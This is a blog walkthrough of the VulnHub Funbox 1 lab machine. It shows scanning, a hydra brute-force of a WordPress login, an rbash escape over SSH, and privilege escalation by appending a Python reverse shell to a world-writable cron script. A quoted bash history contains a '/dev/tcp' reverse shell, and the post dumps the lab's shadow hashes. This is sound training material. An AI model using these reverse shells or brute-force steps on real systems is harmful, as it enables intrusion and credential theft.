VulnHub Funbox 1 Walkthrough – Rbash Escape

Next up on my weekly stream was VulnHub Funbox 1.

VulnHub Funbox 1 Walkthrough - Introduction

My last VulnHub box was Photographer, which I solved the same night as this one.

While it can get a bit repetitive attacking vulnerable WordPress systems, this was the first box that I got to escape restricted bash.

You can find the VM here, and it was about an intermediate difficulty.

Enumeration

First, I ran a ping sweep to see where the box was on my network.

root@kali:~/funbox# nmap -sn 192.168.5.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 20:48 EDT

...

Nmap scan report for 192.168.5.133
Host is up (0.0035s latency).
MAC Address: 08:00:27:4E:6F:CA (Oracle VirtualBox virtual NIC)

Next, I ran a quick port scan, and discovered that ports 21, 22, and 80 were open on the target.

root@kali:~/funbox# nmap -A 192.168.5.133
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 20:48 EDT
Nmap scan report for 192.168.5.133
Host is up (0.00092s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
MAC Address: 08:00:27:4E:6F:CA (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=39945%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F35DF84%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.92 ms 192.168.5.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.25 seconds

When I looked at the robots.txt file, I saw that a secret directory was mentioned.

VulnHub Funbox 1 - Robots

Unfortunately, the secret directory was just a false flag, and there wasn't anything there.

Secrets directory

That said, when I visited the hostname on port 80, I found a basic looking WordPress installation.

WordPress installation

When I performed username enumeration, the first user was obviously 'admin'.

VulnHub Funbox 1 - Admin user

Next, I discovered that user #2 was 'joe miller', as you can see by the title bar.

Joe Miller author

To verify this, I tested the WordPress admin login for a username enumeration vulnerability and confirmed that the 'admin' user existed.

Admin username enumeration

Finally, I also confirmed that the 'joe' username existed.

VulnHub Funbox 1 - Joe username enumeration

Initial Foothold

First, I used hydra to brute-force a password for the joe user.

root@kali:~/funbox# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt funbox.fritz.box -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-08-13 21:10:44

...

[ATTEMPT] target funbox.fritz.box - login "joe" - pass "rockyou" - 14344407 of 0 [child 28688798] (0/13)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "12345678" - 14344408 of 0 [child 28688798] (0/15)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "abc123" - 14344409 of 0 [child 28688798] (0/2)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "nicole" - 14344410 of 0 [child 28688798] (0/3)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "daniel" - 14344411 of 0 [child 28688798] (0/9)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "babygirl" - 14344412 of 0 [child 28688798] (0/6)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "monkey" - 14344413 of 0 [child 28688798] (0/0)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "lovely" - 14344414 of 0 [child 28688798] (0/1)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "jessica" - 14344415 of 0 [child 28688798] (0/5)
[ATTEMPT] target funbox.fritz.box - login "joe" - pass "654321" - 14344416 of 0 [child 28688798] (0/7)
[80][http-post-form] host: funbox.fritz.box   login: joe   password: 12345
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-08-13 21:12:04

Using the joe // 12345 credential combination, I was able to successfully login to the WordPress administrative panel

Successful WordPress authentication

Unfortunately, the 'joe' user was not a WordPress admin, so I could not upload a malicious plugin.

That said, I tested the same credentials over SSH, and was able to successfully login!

root@kali:~/funbox# ssh joe@192.168.5.133
The authenticity of host '192.168.5.133 (192.168.5.133)' can't be established.
ECDSA key fingerprint is SHA256:8BF5XWcRdH2tQKCwjiIBCp3BoP1JLcUYr8gzicYKmEg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.5.133' (ECDSA) to the list of known hosts.
joe@192.168.5.133's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

...

You have mail.
Last login: Sat Jul 18 10:02:39 2020 from 192.168.178.143
joe@funbox:~$

Next, I tried to execute some commands on the target, but was stuck in a restricted bash environment.

joe@funbox:~$ cat .bash-rbash: /dev/null: restricted: cannot redirect output
bash_completion: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash_completion: _upvars: `-a0': invalid number specifier

cat: .ba: No such file or directory

After a quick Google search, I found a great blog post about escaping from rbash.

root@kali:~/funbox# ssh joe@192.168.5.133 -t "bash --noprofile"
joe@192.168.5.133's password:
joe@funbox:~$ cd /home/funny
joe@funbox:/home/funny$

Inside of the 'funny' user's home directory, I discovered a world readable file called '.reminder.sh'.

joe@funbox:/home/funny$ ls -al
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18 10:02 .
drwxr-xr-x 4 root  root      4096 Jun 19 11:50 ..
-rwxrwxrwx 1 funny funny       55 Jul 18 10:15 .backup.sh
-rw------- 1 funny funny     1462 Jul 18 10:07 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25 12:03 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25 12:03 .bashrc
drwx------ 2 funny funny     4096 Jun 19 10:43 .cache
-rw-rw-r-- 1 funny funny 48701440 Aug 14 01:16 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25 12:03 .profile
-rw-rw-r-- 1 funny funny      162 Jun 19 14:13 .reminder.sh
-rw-rw-r-- 1 funny funny       74 Jun 19 12:25 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19 10:44 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18 10:02 .viminfo
joe@funbox:/home/funny$ cat .reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

When I took a look at the '.backup.sh' file, it was a script that would back up the web directory to the html.tar file.

joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:/home/funny$ ls -al /var/www/html
total 240
drwxrwxrwx  6 www-data www-data  4096 Jul 18 10:12 .
drwxr-xr-x  4 root     root      4096 Jun 19 11:18 ..
-rwxrwxrwx  1 www-data www-data 10918 Jun 19 11:16 default.htm

...

-rwxrwxrwx  1 www-data www-data  4755 Jul 17 16:02 wp-trackback.php
-rwxrwxrwx  1 www-data www-data  3133 Jul 17 16:02 xmlrpc.php
joe@funbox:/home/funny$ ls -al /var/www/html/secret/
total 12
drwxrwxr-x 2 joe      joe      4096 Jul 18 10:05 .
drwxrwxrwx 6 www-data www-data 4096 Jul 18 10:12 ..
-rw-rw-r-- 1 joe      joe        30 Jul 18 10:05 index.html

I took a look at the html.tar file from the joe user but didn't find anything interesting or useful for escalation.

joe@funbox:/home/funny$ cp html.tar /home/joe
joe@funbox:/home/funny$ cd /home/joe
joe@funbox:~$ tar -xf html.tar

Privilege Escalation

First, I added a command to the backup script, to see if any other users were executing it. As you can see, the 'funny' user was executing this script.

joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
touch /tmp/test12345
joe@funbox:/home/funny$ ls -al /tmp/test*
-rw-rw-r-- 1 funny funny 0 Aug 14 01:24 /tmp/test12345

Next, I changed the script to include a Python reverse shell, to get access to the funny user.

joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When I caught the reverse shell, I had access to another user account.

root@kali:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49860
/bin/sh: 0: can't access tty; job control turned off
$ id  
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

Unfortunately, I couldn't find any way to escalate from funny to root.

When I looked at joe's mailbox, I found that the root user was asking about the backup script as well as calling out some weak password usage.

joe@funbox:~$ cat /home/joe/mbox
cat /home/joe/mbox
From root@funbox  Fri Jun 19 13:12:38 2020
Return-Path: <root@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 0)
    id 2D257446B0; Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
Subject: Backups
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619131238.2D257446B0@funbox.fritz.box>
Date: Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
From: root <root@funbox>

Hi Joe, please tell funny the backupscript is done.

From root@funbox  Fri Jun 19 13:15:21 2020
Return-Path: <root@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 0)
    id 8E2D4446B0; Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
Subject: Backups
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619131521.8E2D4446B0@funbox.fritz.box>
Date: Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
From: root <root@funbox>

Joe, WTF!?!?!?!?!?! Change your password right now! 12345 is an recommendation to fire you.

When I looked at joe's bash_history file, I thought that I found the root password.

$ cat .bash_history
cat .bash_history
sudo apt update && apt upgrade
su root
sudo su

...

ls -la
passwd root itsreallynotfunny@all
passwd root
passwd -root
sudo su
exit
crontab -e
su root
itsreallynotfunny@all
su root
clear

...

echo "bash -i >& /dev/tcp/192.168.178.143/1234 0>&1" >> /home/funny/.backup.sh
date
crontab -e
date
bash -i >& /dev/tcp/192.168.178.143/1234 0>&1"

...

clear
ls
exit

That said, I had the idea to try and catch my reverse shell again, as the root user could be executing it as well.

When I caught multiple copies of my reverse shell, one of them came back as root!

root@kali:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49870
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ exit
root@kali:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49872
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

When I viewed root's crontab file, this made sense, as the root user was also executing the backup script every five minutes.

root@kali:~/funbox# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.5.132] from funbox.fritz.box [192.168.5.133] 49872
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task

...

*/5 * * * * /home/funny/.backup.sh

Finally, I grabbed the flag file, and finished the box!

# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2

And, as usual, I grabbed the shadow file for potential cracking or research in the future.

# cat /etc/shadow
root:$6$ReRncrEVp8A0IQmk$ANOc.bX2eK8DZv2i/DQPqCWcdE8XV39IVjBBL6xlGSlCPFOPM.H2y7lyDHtJbb.nkH47Zo.sj3OhcxTOl7usR0:18461:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::

...

systemd-coredump:!!:18432::::::
funny:$6$Gh348TZlMEiH8fc.$rFB4/BVFrjkF1z6SbZklOKzVwxhsfY6q9S3jrWDO.2eiwcVDvqrBjL32KPRzW7KkQItvAz4X.T0hcmoO62jV7.:18461:0:99999:7:::
lxd:!:18432::::::
mysql:!:18432:0:99999:7:::
joe:$6$ptLbGWD34AIV6LXw$8zE3IrzaA0mRXeuu1ubjI2OLujCMOuEYInT2H3zGRShKyk2VyLKNI6X643BXyrAYxNYHmwbS9pUfljdJQ8kUS.:18432:0:99999:7:::
postfix:*:18432:0:99999:7:::
proftpd:!:18461:0:99999:7:::
ftp:*:18461:0:99999:7:::

Video Highlight

If you'd rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Funbox 1 Walkthrough - Conclusion

This wasn't a super complicated box, but it was another good one to get back into the swing of things.

I would have liked a different escalation method for funny to root, but it was still a good example of scheduled task exploitation.

Let me know if these write-ups get repetitive posting them all back to back though!

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.